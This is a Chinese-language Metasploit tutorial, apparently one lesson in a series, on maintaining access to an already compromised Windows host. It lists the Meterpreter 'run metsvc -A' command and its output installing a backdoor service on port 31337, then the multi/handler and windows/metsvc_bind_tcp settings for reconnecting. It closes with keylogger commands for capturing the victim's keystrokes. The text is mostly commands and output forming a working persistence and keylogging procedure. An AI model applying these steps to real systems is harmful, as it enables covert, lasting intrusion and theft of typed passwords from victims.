Metasploit之维持访问

Metasploit之维持访问
参考文献：http://www.evil0x.com/posts/26075.html（自动持续后门，非常齐全）
          http://www.2cto.com/article/201301/185502.html

这节课前提是需要已经有了一个攻击后得到的会话

会话方面的参考

09-Metasploit之我的远程控制软件
15-Metasploit之生成webshell及应用
16-Metasploit之远程代码执行
17-Metasploit之MIDI文件解析远程代码执行
21-Metasploit之多种后门生成

会话是有很多种，不管是简单的后门，还是得到的webshell或者通过溢出攻击、CVE漏洞得到等都可以

我们得到的会话是在meterpreter下的，步骤如下：

run metsvc -A    -->运行后门持续功能

得到的回显内容：
[*] Creating a meterpreter service on port 31337//创建端口31337上的Meterpreter服务
[*] Creating a temporary installation directory C:/Users/ADMINI~1/AppData/Local/Temp/lYiEthhyUzaI...//创建一个临时安装目录
[*]  >> Uploading metsrv.x86.dll...//上传metsrv.x86.dll

[*]  >> Uploading metsvc-server.exe...//上传metsvc-server.exe
[*]  >> Uploading metsvc.exe...//上传metsvc.exe
[*] Starting the service...
* Installing service metsvc//安装服务metsvc
 * Starting service//启动服务
Service metsvc successfully installed.//服务metsvc成功安装

[*] Trying to connect to the Meterpreter service at 192.168.2.107:31337...//试图连接到的服务192.168.2.107:31337

PS：这样就已经很明显了，加载了dll文件，并且安装了相关服务，已经做了固定，并且端口方面也做了修改
    接下来我们要去连接的话，需要别的payload，同样的目标IP192.168.2.107，端口31337

尝试退出后重新连接我们的后门，这里需要使用“windows/metsvc_bind_tcp”的模块来连接

use exploit/multi/handler              -->同样需要这个模块来连接后门的

set payload windows/metsvc_bind_tcp    -->使用该payload

show options                           -->查看配置选项

set LPORT 31337                        -->设置端口31337

set RHOST 192.168.2.107                -->设置目标IP地址，这里不是我们自己的IP了，是对方IP

exploit                                -->设置完成后运行再次得到后门连接，实现维持访问

后续：关于键盘输入的记录获取

keyscan_start    -->开始键盘记录

keyscan_dump     -->下载下来从开始到现在的键盘记录

keyscan_stop     -->停止键盘记录